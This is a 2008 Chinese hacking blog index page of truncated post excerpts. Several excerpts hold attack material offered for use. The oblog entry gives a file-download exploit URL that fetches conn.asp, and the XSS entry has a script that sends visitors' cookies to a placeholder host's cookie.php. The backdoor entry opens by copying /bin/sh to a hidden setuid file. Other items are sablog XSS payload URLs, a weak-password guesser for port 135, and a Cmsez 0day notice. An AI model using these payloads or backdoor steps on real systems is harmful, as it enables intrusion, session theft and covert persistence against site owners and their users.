popphen.net.ru
预览模式: 普通 | 列表

IPC空连接测试代码

作者:天晴无名氏 日期:2008-04-10 19:20

//****************************************************
//****** 网蝉工具--135弱口令猜解器 ******
//ip.txt纪录要猜测的IP地址。
//user.txt纪录要猜测的用户名。
//password.txt纪录要猜测的密码。
//3个文件格式为标准的字典文件, 方便与修改和承接其他扫描器扫出的结果。
//********

[阅读全文]

标签: IPC 测试 代码
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 194

ACTCMS网站管理系统cookie注入

作者:天晴无名氏 日期:2008-04-08 00:14

founder:小帅
转载请注明出处: 小帅's blog http://blog.0kee.com/xiaoshuai

<%
id=request("id")
postuser=request("postuser")
sql="select friend from clubuser where clubuser_name='&

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 220

oblog文件下载漏洞

作者:天晴无名氏 日期:2008-04-04 20:20

oblog文件下载漏洞
漏洞存在版本4.6sql+access,一路跟踪下去吧
漏洞文件:attachment.asp
利用很简单:http://test.cn/attachment.asp?path=./conn.asp 即可下载CONN
<!-- #include file="inc/inc_syssite.asp" -->
<%
Dim Path,rs

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 206

MS Windows Explorer Unspecified .DOC File Denial of Service Exploit

作者:天晴无名氏 日期:2008-04-02 12:34

MS Windows Explorer Unspecified .DOC File Denial of Service Exploit

Download the file anywhere excluding on desktop and try to browse it with the Windows explorer and you'll see how it crashes !

-

[阅读全文]

标签: Windows Explorer
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 171

XSS攻击Cookie欺骗中隐藏JavaScript执行

作者:天晴无名氏 日期:2008-04-02 12:30

比如发现一处可XSS地方:<script>alert(不管怎么样弹出就好)</script> 

自己弄个偷cookie的文件。

目的是让其他浏览者去浏览我们设计好的陷阱

<script>document.location='http://URL.com/cookie.php?cookie=&#39;+escape(document.co

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 170

常见的留后门的手法

作者:天晴无名氏 日期:2008-04-02 12:29

常见的留后门的手法

1. Setuid

                         #cp /bin/sh /tmp/.root

                  &nbs

[阅读全文]

标签: 后门
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 166

sablog 1.6 多个跨站漏洞

作者:天晴无名氏 日期:2008-03-29 10:44

Date:2008-03-27
Author:amxku[c.r.s.t]
Version:sablog 1.6

由于过滤不严,存在多个跨站漏洞

PS:
http://www.amxku.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.a

[阅读全文]

标签: sablog 漏洞
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 175

使用Lns杜绝Arp欺骗

作者:天晴无名氏 日期:2008-03-24 00:08



对于服务器来说,Arp欺骗是一种很烦人的攻击

为了便于说明,我们先假设一个子网环境:

网关 : IP = IP-1, MAC = 11:11:11:11:11:11

本机 : IP = IP-2, MAC = 22:22:22:22:22:22

主机A: IP = IP-A, MAC = AA:AA:AA:AA:AA:AA

主机B: IP = IP-B, MAC = BB:BB:BB:BB:BB

[阅读全文]

标签: Lns 杜绝 Arp 欺骗
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 222

alpha2 shellcode解密的vbs脚本

作者:天晴无名氏 日期:2008-03-23 23:56

来源:安全中国

alpha2 shellcode解密的vbs脚本

 
author:lcx 

fromhttp://hi.baidu.com/myvbscript/blog/item/bf7ce603b9a3e8733812bb44.html 

’说明:只针对alpha2的TYIIIIIIIIIIIIIIII这样的加密来解密,没有做更多的容错处理,只是解出下载ur

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 218

Cmsez(随易)全站系统 0day

作者:天晴无名氏 日期:2008-03-17 13:06

零客网络安全小组www.0kee.com”或者以超连接方式注明

---------------------------------灰常不淫荡的割JJ线-------------------------------

程序名称:Cmsez Web Content Manage System v2.0.0
漏洞发现:小帥(小帅)
公布时间:08-03-14
漏洞影响:严重
漏洞文件:comm

[阅读全文]

标签: Cmsez 随易 系统 0day
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 192